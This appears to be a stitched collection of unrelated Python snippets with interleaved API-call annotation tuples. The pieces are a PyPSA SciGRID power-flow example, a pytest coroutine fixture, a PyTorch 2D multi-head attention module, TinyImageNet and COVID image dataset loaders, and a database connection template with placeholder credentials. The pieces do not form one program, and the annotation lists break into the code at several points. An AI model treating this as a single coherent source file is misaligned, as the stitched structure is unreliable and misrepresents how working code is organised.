1754), False, 'import matches\n'), ((1963, 1991), 'flask.request.get_json', 'request.get_json', ([], {'force': '(True)'}), '(force=True)\n', (1979, 1991), False, 'from flask import request, jsonify, abort\n'), 
((2050, 2086), 'matches.MatchResultsWriter', 'matches.MatchResultsWriter', (['game_key'], {}), '(game_key)\n', (2076, 2086), False, 'import matches\n'), ((2186, 2213), 'matches.MatchCreatorJob', 'matches.MatchCreatorJob', (['db'], {}), '(db)\n', (2209, 2213), False, 'import matches\n'), ((2245, 2271), 'flask.jsonify', 'jsonify', (["{'success': True}"], {}), "({'success': True})\n", (2252, 2271), False, 'from flask import request, jsonify, abort\n'), ((839, 849), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (844, 849), False, 'from flask import request, jsonify, abort\n'), ((961, 990), 'bots.BotInfo', 'bots.BotInfo', (['db', 'guid_or_key'], {}), '(db, guid_or_key)\n', (973, 990), False, 'import bots\n'), ((1019, 1029), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (1024, 1029), False, 'from flask import request, jsonify, abort\n'), ((1802, 1839), 'flask.jsonify', 'jsonify', ([], {'status': 'code', 'message': 'message'}), '(status=code, message=message)\n', (1809, 1839), False, 'from flask import request, jsonify, abort\n'), ((2026, 2036), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (2031, 2036), False, 'from flask import request, jsonify, abort\n'), ((2122, 2132), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (2127, 2132), False, 'from flask import request, jsonify, abort\n')] |
from dataapi import TrackerFeeder
from sqlalchemy import create_engine
import matplotlib.pyplot as plt
connect_dict = {'flavor': 'postgres+psycopg2',
'database': '[DATABASE NAME]',
'schema': '[DATABASE SCHEMA]',
'user': '[USERNAME]',
'password': '[PASSWORD]',
'host': '[HOST ADDRESS]',
'port': '[PORT NUMBER]'}
db_connect = create_engine("{flavor}://{username}:{password}@{host}:{port}/{database}"
.format(host=connect_dict['host'],
database=connect_dict['database'],
username=connect_dict['user'],
password=connect_dict['password'],
port=connect_dict['port'],
flavor=connect_dict['flavor']))
# ===== Examples =====
tf = TrackerFeeder(db_connect)
# Fetch the full metadata table (useful for filtering)
df = tf.fetch_metadata()
print(df)
# fetch specific tickers
df = tf.fetch(['eqs br itub4', 'eqs us jpm'])
print(df)
# fetch assets with certain characteristics
filter_dict = {'sector': ['industrial', 'financial'],
'country': 'BR'}
df = tf.filter_fetch(filter_dict, ret='series')
print(df)
# grab metadata possibilities
param_dict = tf.filter_parameters()
print(param_dict)
| [
"dataapi.TrackerFeeder"
] | [((922, 947), 'dataapi.TrackerFeeder', 'TrackerFeeder', (['db_connect'], {}), '(db_connect)\n', (935, 947), False, 'from dataapi import TrackerFeeder\n')] |
import sys
import os
import pytest
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
@pytest.fixture
def mock_coroutine(mocker, monkeypatch):
def _create_coro_patch(*args):
"""Fixture to mock a corotine. If an object path is given, monkeypatch
the coroutine with the mocked one.
Args:
args (list[str]) Arguments for monkeypatch, e.g. the object path
"""
coro_mock = mocker.Mock()
async def _coroutine(*args, **kwargs):
return coro_mock(*args, **kwargs)
if args:
monkeypatch.setattr(*args, _coroutine)
return _coroutine, coro_mock
return _create_coro_patch
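# Added for illustration (not part of the original fixtures): a sketch of how the
# factory is meant to be used in a test module. Patching 'asyncio.sleep' is just an
# example target; running an async test like this also assumes pytest-asyncio (or a
# similar plugin) and `import asyncio` in the test module.
#
#   async def test_sleep_is_mocked(mock_coroutine):
#       _, sleep_mock = mock_coroutine('asyncio.sleep')
#       await asyncio.sleep(5)          # resolves immediately, no real delay
#       sleep_mock.assert_called_once_with(5)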
| [
"os.path.dirname"
] | [((84, 109), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (99, 109), False, 'import os\n')] |
import torch
import torch.nn.functional as F
import torch.nn as nn
class multi_head_attention_2d(torch.nn.Module):
def __init__(self, in_channel, key_filters, value_filters,
output_filters, num_heads, dropout_prob=0.5, layer_type='SAME'):
super().__init__()
"""Multihead scaled-dot-product attention with input/output transformations.
Args:
            inputs: a Tensor with shape [batch, channels, h, w]
key_filters: an integer. Note that queries have the same number
of channels as keys
value_filters: an integer
            output_filters: an integer
num_heads: an integer dividing key_filters and value_filters
layer_type: a string, type of this layer -- SAME, DOWN, UP
Returns:
            A Tensor of shape [batch, output_filters, _h, _w]
Raises:
ValueError: if the key_filters or value_filters are not divisible
by the number of attention heads.
"""
if key_filters % num_heads != 0:
raise ValueError("Key depth (%d) must be divisible by the number of "
"attention heads (%d)." % (key_filters, num_heads))
if value_filters % num_heads != 0:
raise ValueError("Value depth (%d) must be divisible by the number of "
"attention heads (%d)." % (value_filters, num_heads))
if layer_type not in ['SAME', 'DOWN', 'UP']:
raise ValueError("Layer type (%s) must be one of SAME, "
"DOWN, UP." % (layer_type))
self.num_heads = num_heads
self.layer_type = layer_type
self.QueryTransform = None
if layer_type == 'SAME':
self.QueryTransform = nn.Conv2d(in_channel, key_filters, kernel_size=1, stride=1,
padding=0, bias=True)
elif layer_type == 'DOWN':
self.QueryTransform = nn.Conv2d(in_channel, key_filters, kernel_size=3, stride=2,
padding=1, bias=True) # author use bias
elif layer_type == 'UP':
self.QueryTransform = nn.ConvTranspose2d(in_channel, key_filters, kernel_size=3, stride=2,
padding=1, bias=True)
self.KeyTransform = nn.Conv2d(in_channel, key_filters, kernel_size=1, stride=1, padding=0, bias=True)
self.ValueTransform = nn.Conv2d(in_channel, value_filters, kernel_size=1, stride=1, padding=0, bias=True)
self.attention_dropout = nn.Dropout(dropout_prob)
self.outputConv = nn.Conv2d(value_filters, output_filters, kernel_size=1, stride=1, padding=0, bias=True)
self._scale = (key_filters // num_heads) ** 0.5
def forward(self, inputs):
"""
:param inputs: B, C, H, W
:return: inputs: B, Co, Hq, Wq
"""
if self.layer_type == 'SAME' or self.layer_type == 'DOWN':
q = self.QueryTransform(inputs)
elif self.layer_type == 'UP':
q = self.QueryTransform(inputs, output_size=(inputs.shape[2]*2, inputs.shape[3]*2))
# [B, Hq, Wq, Ck]
k = self.KeyTransform(inputs).permute(0, 2, 3, 1)
v = self.ValueTransform(inputs).permute(0, 2, 3, 1)
q = q.permute(0, 2, 3, 1)
Batch, Hq, Wq = q.shape[0], q.shape[1], q.shape[2]
#[B, H, W, N, Ck]
k = self.split_heads(k, self.num_heads)
v = self.split_heads(v, self.num_heads)
q = self.split_heads(q, self.num_heads)
#[(B, H, W, N), c]
k = torch.flatten(k, 0, 3)
v = torch.flatten(v, 0, 3)
q = torch.flatten(q, 0, 3)
# normalize
q = q / self._scale
# attention
#[(B, Hq, Wq, N), (B, H, W, N)]
A = torch.matmul(q, k.transpose(0, 1))
A = torch.softmax(A, dim=1)
A = self.attention_dropout(A)
# [(B, Hq, Wq, N), C]
O = torch.matmul(A, v)
# [B, Hq, Wq, C]
O = O.view(Batch, Hq, Wq, v.shape[-1]*self.num_heads)
# [B, C, Hq, Wq]
O = O.permute(0, 3, 1, 2)
# [B, Co, Hq, Wq]
O = self.outputConv(O)
return O
def split_heads(self, x, num_heads):
"""Split channels (last dimension) into multiple heads.
Args:
x: a Tensor with shape [batch, h, w, channels]
num_heads: an integer
Returns:
a Tensor with shape [batch, h, w, num_heads, channels / num_heads]
"""
channel_num = x.shape[-1]
return x.view(x.shape[0], x.shape[1], x.shape[2], num_heads, int(channel_num/num_heads))
if __name__ == '__main__':
device = torch.device('cpu') #cuda:0
inputs = torch.rand(20, 50, 50).unsqueeze(0).to(device)
net = multi_head_attention_2d(20, 4, 4, 11, 4, 0.5, 'UP') # 'SAME', 'DOWN', 'UP'
res = net(inputs)
print('input shape:', inputs.shape)
    print('res shape:', res.shape)
| [
"torch.nn.Dropout",
"torch.rand",
"torch.nn.Conv2d",
"torch.softmax",
"torch.matmul",
"torch.nn.ConvTranspose2d",
"torch.flatten",
"torch.device"
] | [((4702, 4721), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (4714, 4721), False, 'import torch\n'), ((2330, 2416), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'key_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=1, stride=1, padding=0, bias\n =True)\n', (2339, 2416), True, 'import torch.nn as nn\n'), ((2442, 2529), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'value_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channel, value_filters, kernel_size=1, stride=1, padding=0,\n bias=True)\n', (2451, 2529), True, 'import torch.nn as nn\n'), ((2559, 2583), 'torch.nn.Dropout', 'nn.Dropout', (['dropout_prob'], {}), '(dropout_prob)\n', (2569, 2583), True, 'import torch.nn as nn\n'), ((2611, 2702), 'torch.nn.Conv2d', 'nn.Conv2d', (['value_filters', 'output_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(value_filters, output_filters, kernel_size=1, stride=1, padding=0,\n bias=True)\n', (2620, 2702), True, 'import torch.nn as nn\n'), ((3581, 3603), 'torch.flatten', 'torch.flatten', (['k', '(0)', '(3)'], {}), '(k, 0, 3)\n', (3594, 3603), False, 'import torch\n'), ((3616, 3638), 'torch.flatten', 'torch.flatten', (['v', '(0)', '(3)'], {}), '(v, 0, 3)\n', (3629, 3638), False, 'import torch\n'), ((3651, 3673), 'torch.flatten', 'torch.flatten', (['q', '(0)', '(3)'], {}), '(q, 0, 3)\n', (3664, 3673), False, 'import torch\n'), ((3842, 3865), 'torch.softmax', 'torch.softmax', (['A'], {'dim': '(1)'}), '(A, dim=1)\n', (3855, 3865), False, 'import torch\n'), ((3948, 3966), 'torch.matmul', 'torch.matmul', (['A', 'v'], {}), '(A, v)\n', (3960, 3966), False, 'import torch\n'), ((1793, 1879), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'key_filters'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=1, stride=1, padding=0, bias\n =True)\n', (1802, 1879), True, 'import torch.nn as nn\n'), ((1976, 2062), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channel', 'key_filters'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=3, stride=2, padding=1, bias\n =True)\n', (1985, 2062), True, 'import torch.nn as nn\n'), ((2178, 2272), 'torch.nn.ConvTranspose2d', 'nn.ConvTranspose2d', (['in_channel', 'key_filters'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)', 'bias': '(True)'}), '(in_channel, key_filters, kernel_size=3, stride=2,\n padding=1, bias=True)\n', (2196, 2272), True, 'import torch.nn as nn\n'), ((4744, 4766), 'torch.rand', 'torch.rand', (['(20)', '(50)', '(50)'], {}), '(20, 50, 50)\n', (4754, 4766), False, 'import torch\n')] |
# -*- coding: utf-8 -*-
## LOPF then non-linear power flow with SciGRID
#
# This Jupyter Notebook is also available to download at: <https://pypsa.readthedocs.io/en/latest/examples/scigrid-lopf-then-pf.ipynb> and can be viewed as an HTML page at: <https://pypsa.readthedocs.io/en/latest/examples/scigrid-lopf-then-pf.html>.
#
# In this example, the dispatch of generators is optimised using the linear OPF, then a non-linear power flow is run on the resulting dispatch.
#
# The data files for this example are in the examples folder of the github repository: <https://github.com/PyPSA/PyPSA>.
#
### Data sources
#
# Grid: based on [SciGRID](http://scigrid.de/) Version 0.2 which is based on [OpenStreetMap](http://www.openstreetmap.org/).
#
# Load size and location: based on Landkreise (NUTS 3) GDP and population.
#
# Load time series: from ENTSO-E hourly data, scaled up uniformly by factor 1.12 (a simplification of the methodology in Schumacher, Hirth (2015)).
#
# Conventional power plant capacities and locations: BNetzA list.
#
# Wind and solar capacities and locations: EEG Stammdaten, based on http://www.energymap.info/download.html, which represents capacities at the end of 2014. Units without PLZ are removed.
#
# Wind and solar time series: REatlas, Andresen et al, "Validation of Danish wind time series from a new global renewable energy atlas for energy system analysis," Energy 93 (2015) 1074 - 1088.
#
# NB:
#
# All times in the dataset are UTC.
#
# Where SciGRID nodes have been split into 220kV and 380kV substations, all load and generation is attached to the 220kV substation.
#
### Warnings
#
# This script and the data behind it are no longer supported. See https://github.com/PyPSA/pypsa-eur for a newer model that covers the whole of Europe.
#
# This dataset is ONLY intended to demonstrate the capabilities of PyPSA and is NOT (yet) accurate enough to be used for research purposes.
#
# Known problems include:
#
# i) Rough approximations have been made for missing grid data, e.g. 220kV-380kV transformers and connections between close sub-stations missing from OSM.
#
# ii) There appears to be some unexpected congestion in parts of the network, which may mean for example that the load attachment method (by Voronoi cell overlap with Landkreise) isn't working, particularly in regions with a high density of substations.
#
# iii) Attaching power plants to the nearest high voltage substation may not reflect reality.
#
# iv) There is no proper n-1 security in the calculations - this can either be simulated with a blanket e.g. 70% reduction in thermal limits (as done here) or a proper security constrained OPF (see e.g. <https://pypsa.readthedocs.io/en/latest/examples/scigrid-sclopf.ipynb>).
#
# v) The borders and neighbouring countries are not represented.
#
# vi) Hydroelectric power stations are not modelled accurately.
#
# viii) The marginal costs are illustrative, not accurate.
#
# ix) Only the first day of 2011 is in the github dataset, which is not representative. The full year of 2011 can be downloaded at <https://pypsa.readthedocs.io/en/latest/examples/scigrid-with-load-gen-trafos-2011.zip>.
#
# x) The ENTSO-E total load for Germany may not be scaled correctly; it is scaled up uniformly by factor 1.12 (a simplification of the methodology in Schumacher, Hirth (2015), which suggests monthly factors).
#
# xi) Biomass from the EEG Stammdaten are not read in at the moment.
#
# xii) Power plant start up costs, ramping limits/costs, minimum loading rates are not considered.
import os
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pypsa
#%matplotlib inline
# You may have to adjust this path to where
# you downloaded the github repository
# https://github.com/PyPSA/PyPSA
csv_folder_name = (
os.path.dirname(pypsa.__file__)
+ "/../examples/scigrid-de/scigrid-with-load-gen-trafos/"
)
network = pypsa.Network(csv_folder_name=csv_folder_name)
### Plot the distribution of the load and of generating tech
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 6)
load_distribution = (
network.loads_t.p_set.loc[network.snapshots[0]].groupby(network.loads.bus).sum()
)
network.plot(bus_sizes=0.5 * load_distribution, ax=ax, title="Load distribution")
fig.tight_layout()
# fig.savefig('load-distribution.png')
network.generators.groupby("carrier")["p_nom"].sum()
network.storage_units.groupby("carrier")["p_nom"].sum()
techs = ["Gas", "Brown Coal", "Hard Coal", "Wind Offshore", "Wind Onshore", "Solar"]
n_graphs = len(techs)
n_cols = 3
if n_graphs % n_cols == 0:
n_rows = n_graphs // n_cols
else:
n_rows = n_graphs // n_cols + 1
fig, axes = plt.subplots(
nrows=n_rows, ncols=n_cols, subplot_kw={"projection": ccrs.PlateCarree()}
)
size = 4
fig.set_size_inches(size * n_cols, size * n_rows)
for i, tech in enumerate(techs):
i_row = i // n_cols
i_col = i % n_cols
ax = axes[i_row, i_col]
gens = network.generators[network.generators.carrier == tech]
gen_distribution = (
gens.groupby("bus").sum()["p_nom"].reindex(network.buses.index, fill_value=0.0)
)
network.plot(ax=ax, bus_sizes=0.2 * gen_distribution)
ax.set_title(tech)
### Run Linear Optimal Power Flow on the first day of 2011
# to approximate n-1 security and allow room for reactive power flows,
# don't allow any line to be loaded above 70% of their thermal rating
contingency_factor = 0.7
network.lines.s_max_pu = contingency_factor
# There are some infeasibilities without small extensions
network.lines.loc[["316", "527", "602"], "s_nom"] = 1715
# the lines to extend to resolve infeasibilities can
# be found by
# uncommenting the lines below to allow the network to be extended
# network.lines["s_nom_original"] = network.lines.s_nom
# network.lines.s_nom_extendable = True
# network.lines.s_nom_min = network.lines.s_nom
# Assume 450 EUR/MVA/km
# network.lines.capital_cost = 450*network.lines.length
group_size = 4
solver_name = "cbc"
print("Performing linear OPF for one day, {} snapshots at a time:".format(group_size))
network.storage_units.state_of_charge_initial = 0.0
for i in range(int(24 / group_size)):
# set the initial state of charge based on previous round
if i > 0:
network.storage_units.state_of_charge_initial = (
network.storage_units_t.state_of_charge.loc[
network.snapshots[group_size * i - 1]
]
)
network.lopf(
network.snapshots[group_size * i : group_size * i + group_size],
solver_name=solver_name,
keep_files=True,
)
# network.lines.s_nom = network.lines.s_nom_opt
# if lines are extended, look at which ones are bigger
# network.lines[["s_nom_original","s_nom"]][abs(network.lines.s_nom - network.lines.s_nom_original) > 1]
p_by_carrier = network.generators_t.p.groupby(network.generators.carrier, axis=1).sum()
p_by_carrier.drop(
(p_by_carrier.max()[p_by_carrier.max() < 1700.0]).index, axis=1, inplace=True
)
p_by_carrier.columns
colors = {
"Brown Coal": "brown",
"Hard Coal": "k",
"Nuclear": "r",
"Run of River": "green",
"Wind Onshore": "blue",
"Solar": "yellow",
"Wind Offshore": "cyan",
"Waste": "orange",
"Gas": "orange",
}
# reorder
cols = [
"Nuclear",
"Run of River",
"Brown Coal",
"Hard Coal",
"Gas",
"Wind Offshore",
"Wind Onshore",
"Solar",
]
p_by_carrier = p_by_carrier[cols]
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 6)
(p_by_carrier / 1e3).plot(
kind="area",
ax=ax,
linewidth=4,
colors=[colors[col] for col in p_by_carrier.columns],
)
ax.legend(ncol=4, loc="upper left")
ax.set_ylabel("GW")
ax.set_xlabel("")
fig.tight_layout()
# fig.savefig("stacked-gen.png")
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 6)
p_storage = network.storage_units_t.p.sum(axis=1)
state_of_charge = network.storage_units_t.state_of_charge.sum(axis=1)
p_storage.plot(label="Pumped hydro dispatch", ax=ax, linewidth=3)
state_of_charge.plot(label="State of charge", ax=ax, linewidth=3)
ax.legend()
ax.grid()
ax.set_ylabel("MWh")
ax.set_xlabel("")
fig.tight_layout()
# fig.savefig("storage-scigrid.png")
now = network.snapshots[4]
print("With the linear load flow, there is the following per unit loading:")
loading = network.lines_t.p0.loc[now] / network.lines.s_nom
print(loading.describe())
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 6)
network.plot(
ax=ax, line_colors=abs(loading), line_cmap=plt.cm.jet, title="Line loading"
)
fig.tight_layout()
# fig.savefig("line-loading.png")
network.buses_t.marginal_price.loc[now].describe()
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 4)
network.plot(ax=ax, line_widths=pd.Series(0.5, network.lines.index))
plt.hexbin(
network.buses.x,
network.buses.y,
gridsize=20,
C=network.buses_t.marginal_price.loc[now],
cmap=plt.cm.jet,
)
# for some reason the colorbar only works with graphs plt.plot
# and must be attached plt.colorbar
cb = plt.colorbar()
cb.set_label("Locational Marginal Price (EUR/MWh)")
fig.tight_layout()
# fig.savefig('lmp.png')
### Look at variable curtailment
carrier = "Wind Onshore"
capacity = network.generators.groupby("carrier").sum().at[carrier, "p_nom"]
p_available = network.generators_t.p_max_pu.multiply(network.generators["p_nom"])
p_available_by_carrier = p_available.groupby(network.generators.carrier, axis=1).sum()
p_curtailed_by_carrier = p_available_by_carrier - p_by_carrier
p_df = pd.DataFrame(
{
carrier + " available": p_available_by_carrier[carrier],
carrier + " dispatched": p_by_carrier[carrier],
carrier + " curtailed": p_curtailed_by_carrier[carrier],
}
)
p_df[carrier + " capacity"] = capacity
p_df["Wind Onshore curtailed"][p_df["Wind Onshore curtailed"] < 0.0] = 0.0
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 6)
p_df[[carrier + " dispatched", carrier + " curtailed"]].plot(
kind="area", ax=ax, linewidth=3
)
p_df[[carrier + " available", carrier + " capacity"]].plot(ax=ax, linewidth=3)
ax.set_xlabel("")
ax.set_ylabel("Power [MW]")
ax.set_ylim([0, 40000])
ax.legend()
fig.tight_layout()
# fig.savefig("scigrid-curtailment.png")
## Check power flow
now = network.snapshots[0]
for bus in network.buses.index:
bus_sum = network.buses_t.p.loc[now, bus]
branches_sum = 0
for comp in ["lines", "transformers"]:
comps = getattr(network, comp)
comps_t = getattr(network, comp + "_t")
branches_sum += (
comps_t.p0.loc[now, comps.bus0 == bus].sum()
- comps_t.p0.loc[now, comps.bus1 == bus].sum()
)
if abs(bus_sum - branches_sum) > 1e-4:
print(bus, bus_sum, branches_sum)
### Now perform a full Newton-Raphson power flow on the first hour
# For the PF, set the P to the optimised P
network.generators_t.p_set = network.generators_t.p_set.reindex(
columns=network.generators.index
)
network.generators_t.p_set = network.generators_t.p
network.storage_units_t.p_set = network.storage_units_t.p_set.reindex(
columns=network.storage_units.index
)
network.storage_units_t.p_set = network.storage_units_t.p
# set all buses to PV, since we don't know what Q set points are
network.generators.control = "PV"
# set slack
# network.generators.loc["1 Coal","control"] = "Slack"
# Need some PQ buses so that Jacobian doesn't break
f = network.generators[network.generators.bus == "492"]
network.generators.loc[f.index, "control"] = "PQ"
print("Performing non-linear PF on results of LOPF:")
info = network.pf()
# any failed to converge?
(~info.converged).any().any()
print(
"With the non-linear load flow, there is the following per unit loading\nof the full thermal rating:"
)
print((network.lines_t.p0.loc[now] / network.lines.s_nom).describe())
# Get voltage angle differences
df = network.lines.copy()
for b in ["bus0", "bus1"]:
df = pd.merge(
df, network.buses_t.v_ang.loc[[now]].T, how="left", left_on=b, right_index=True
)
s = df[str(now) + "_x"] - df[str(now) + "_y"]
print("The voltage angle differences across the lines have (in degrees):")
print((s * 180 / np.pi).describe())
# plot the reactive power
fig, ax = plt.subplots(1, 1, subplot_kw={"projection": ccrs.PlateCarree()})
fig.set_size_inches(6, 6)
q = network.buses_t.q.loc[now]
bus_colors = pd.Series("r", network.buses.index)
bus_colors[q < 0.0] = "b"
network.plot(
bus_sizes=abs(q),
ax=ax,
bus_colors=bus_colors,
title="Reactive power feed-in (red=+ve, blue=-ve)",
)
fig.tight_layout()
# fig.savefig("reactive-power.png")
network.generators_t.q.loc[now].sum()
network.buses_t.q.loc[now].sum()
| [
"pandas.Series",
"matplotlib.pyplot.hexbin",
"pandas.merge",
"matplotlib.pyplot.colorbar",
"pypsa.Network",
"cartopy.crs.PlateCarree",
"os.path.dirname",
"pandas.DataFrame",
"matplotlib.pyplot.subplots"
] | [((3922, 3968), 'pypsa.Network', 'pypsa.Network', ([], {'csv_folder_name': 'csv_folder_name'}), '(csv_folder_name=csv_folder_name)\n', (3935, 3968), False, 'import pypsa\n'), ((7529, 7547), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (7541, 7547), True, 'import matplotlib.pyplot as plt\n'), ((7851, 7869), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (7863, 7869), True, 'import matplotlib.pyplot as plt\n'), ((8941, 9063), 'matplotlib.pyplot.hexbin', 'plt.hexbin', (['network.buses.x', 'network.buses.y'], {'gridsize': '(20)', 'C': 'network.buses_t.marginal_price.loc[now]', 'cmap': 'plt.cm.jet'}), '(network.buses.x, network.buses.y, gridsize=20, C=network.buses_t\n .marginal_price.loc[now], cmap=plt.cm.jet)\n', (8951, 9063), True, 'import matplotlib.pyplot as plt\n'), ((9188, 9202), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (9200, 9202), True, 'import matplotlib.pyplot as plt\n'), ((9680, 9871), 'pandas.DataFrame', 'pd.DataFrame', (["{(carrier + ' available'): p_available_by_carrier[carrier], (carrier +\n ' dispatched'): p_by_carrier[carrier], (carrier + ' curtailed'):\n p_curtailed_by_carrier[carrier]}"], {}), "({(carrier + ' available'): p_available_by_carrier[carrier], (\n carrier + ' dispatched'): p_by_carrier[carrier], (carrier +\n ' curtailed'): p_curtailed_by_carrier[carrier]})\n", (9692, 9871), True, 'import pandas as pd\n'), ((10021, 10039), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (10033, 10039), True, 'import matplotlib.pyplot as plt\n'), ((12533, 12568), 'pandas.Series', 'pd.Series', (['"""r"""', 'network.buses.index'], {}), "('r', network.buses.index)\n", (12542, 12568), True, 'import pandas as pd\n'), ((3815, 3846), 'os.path.dirname', 'os.path.dirname', (['pypsa.__file__'], {}), '(pypsa.__file__)\n', (3830, 3846), False, 'import os\n'), ((12093, 12186), 'pandas.merge', 'pd.merge', (['df', 'network.buses_t.v_ang.loc[[now]].T'], {'how': '"""left"""', 'left_on': 'b', 'right_index': '(True)'}), "(df, network.buses_t.v_ang.loc[[now]].T, how='left', left_on=b,\n right_index=True)\n", (12101, 12186), True, 'import pandas as pd\n'), ((8904, 8939), 'pandas.Series', 'pd.Series', (['(0.5)', 'network.lines.index'], {}), '(0.5, network.lines.index)\n', (8913, 8939), True, 'import pandas as pd\n'), ((4087, 4105), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (4103, 4105), True, 'import cartopy.crs as ccrs\n'), ((4807, 4825), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (4823, 4825), True, 'import cartopy.crs as ccrs\n'), ((8517, 8535), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (8533, 8535), True, 'import cartopy.crs as ccrs\n'), ((8823, 8841), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (8839, 8841), True, 'import cartopy.crs as ccrs\n'), ((12439, 12457), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (12455, 12457), True, 'import cartopy.crs as ccrs\n')] |
import os
import glob
import numpy as np
import cv2
from PIL import Image, ImageFile
import torch
from torch.utils.data import Dataset
import torchvision.transforms as transforms
class BatchManagerTinyImageNet(Dataset):
def __init__(self, split='train',transform=None):
assert split in ['train', 'val']
self.transform = transform
self._base_dir = './tiny-imagenet-200/'
self._data_dir = os.path.join(self._base_dir, split)
        # list of (image_path, class_code) tuples; class_idx is derived in __getitem__
self.image_paths_and_classes = []
if split == 'train':
self._class_codes = sorted([os.path.basename(class_dir) for class_dir in glob.glob(os.path.join(self._data_dir, '*'))])
for class_code in self._class_codes:
# class_image_paths = glob.glob(os.path.join(self._data_dir, class_code, '*/*'))
class_image_paths = os.path.join(self._data_dir, class_code+'/*')
class_image_paths = glob.glob(class_image_paths)
for class_image_path in class_image_paths:
if os.path.splitext(os.path.basename(class_image_path))[-1].lower() in ['.jpeg', '.jpg', '.png']:
self.image_paths_and_classes.append((class_image_path, class_code))
elif split == 'val':
self._class_codes = []
with open(os.path.join(self._data_dir, 'val_annotations.txt'), 'r') as f:
lines = f.readlines()
for line in lines:
line_tokens = line.strip().split("\t")
im_name, class_code = line_tokens[0], line_tokens[1]
self.image_paths_and_classes.append((os.path.join(self._data_dir, 'images', im_name), class_code))
self._class_codes.append(class_code)
self._class_codes = sorted(list(set(self._class_codes)))
def __getitem__(self, sample_idx):
image_path, class_code = self.image_paths_and_classes[sample_idx]
class_idx = self._class_codes.index(class_code)
image = Image.open(image_path).convert("RGB")
if self.transform:
image = self.transform(image)
# image = np.transpose(cv2.imread(image_path), axes=(2,0,1)).astype(np.float32)
return image, class_idx
def __len__(self):
        return len(self.image_paths_and_classes)
| [
"PIL.Image.open",
"os.path.join",
"os.path.basename",
"glob.glob"
] | [((424, 459), 'os.path.join', 'os.path.join', (['self._base_dir', 'split'], {}), '(self._base_dir, split)\n', (436, 459), False, 'import os\n'), ((901, 948), 'os.path.join', 'os.path.join', (['self._data_dir', "(class_code + '/*')"], {}), "(self._data_dir, class_code + '/*')\n", (913, 948), False, 'import os\n'), ((983, 1011), 'glob.glob', 'glob.glob', (['class_image_paths'], {}), '(class_image_paths)\n', (992, 1011), False, 'import glob\n'), ((2088, 2110), 'PIL.Image.open', 'Image.open', (['image_path'], {}), '(image_path)\n', (2098, 2110), False, 'from PIL import Image, ImageFile\n'), ((627, 654), 'os.path.basename', 'os.path.basename', (['class_dir'], {}), '(class_dir)\n', (643, 654), False, 'import os\n'), ((1388, 1439), 'os.path.join', 'os.path.join', (['self._data_dir', '"""val_annotations.txt"""'], {}), "(self._data_dir, 'val_annotations.txt')\n", (1400, 1439), False, 'import os\n'), ((682, 715), 'os.path.join', 'os.path.join', (['self._data_dir', '"""*"""'], {}), "(self._data_dir, '*')\n", (694, 715), False, 'import os\n'), ((1714, 1761), 'os.path.join', 'os.path.join', (['self._data_dir', '"""images"""', 'im_name'], {}), "(self._data_dir, 'images', im_name)\n", (1726, 1761), False, 'import os\n'), ((1111, 1145), 'os.path.basename', 'os.path.basename', (['class_image_path'], {}), '(class_image_path)\n', (1127, 1145), False, 'import os\n')] |
"""Implements COVID Img Slic sDataset"""
import os
import pandas as pd
import torch
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
from src.modules.transforms import *
from src.utils.mapper import configmapper
@configmapper.map("datasets", "covid_img_slic")
class CovidImgSlic(Dataset):
def __init__(self, config):
super().__init__()
self.config = config
graph_transformations = []
for transform in config.graph_transform_args:
param_dict = (
dict(transform["params"]) if transform["params"] is not None else {}
)
graph_transformations.append(
configmapper.get_object("transforms", transform["type"])(**param_dict)
)
self.graph_transform = (
transforms.Compose(graph_transformations)
if graph_transformations != []
else None
)
image_transformations = []
for transform in config.image_transform_args:
param_dict = (
dict(transform["params"]) if transform["params"] is not None else {}
)
image_transformations.append(
configmapper.get_object("transforms", transform["type"])(**param_dict)
)
self.image_transform = (
transforms.Compose(image_transformations)
if image_transformations != []
else None
)
self.data_paths_df = pd.read_csv(config.data_paths_csv)
self.data_paths_df["path"] = self.data_paths_df["path"].apply(
